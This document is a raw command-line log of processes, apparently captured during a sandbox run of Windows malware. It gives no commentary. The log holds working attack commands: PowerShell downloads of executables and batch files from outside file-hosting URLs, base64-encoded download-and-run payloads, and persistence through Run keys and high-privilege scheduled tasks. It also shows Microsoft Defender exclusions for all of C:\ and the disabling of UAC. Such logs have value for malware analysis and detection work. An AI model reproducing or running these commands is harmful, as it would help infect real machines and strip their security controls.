C:\Users\Admin\AppData\Roaming\2WinDefault.exe
"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5188 -ip 5188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 804
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bc3b6a24-a93b-46f3-91a4-21d08640e91e.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\bc3b6a24-a93b-46f3-91a4-21d08640e91e.bat
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
C:\Users\Public\Music\RunNihaiersion.exe
RunNihaiersion.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil.exe
"C:\Users\Public\Music\israil.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
C:\Users\Public\Music\RunihaiVersion.exe
RunihaiVersion.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
C:\Windows\SysWOW64\net.exe
net session
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 session
C:\Users\Public\Music\israil2.exe
"C:\Users\Public\Music\israil2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\xx.exe
xx.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe
C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe
C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe
C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe
C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe
C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe
C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe
C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe
C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe
C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\UhDeflkK5l.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="
C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe
C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe
C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe
C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
C:\Users\Admin\AppData\Roaming\WiDefault.exe
"C:\Users\Admin\AppData\Roaming\WiDefault.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1748 -ip 1748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 776
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap6908:1456:7zEvent30571 -tzip -sae -- "C:\Users\Admin\AppData\Local\Temp\Temp.zip"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff8e2349758,0x7ff8e2349768,0x7ff8e2349778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4736 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5424 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4836 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5436 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
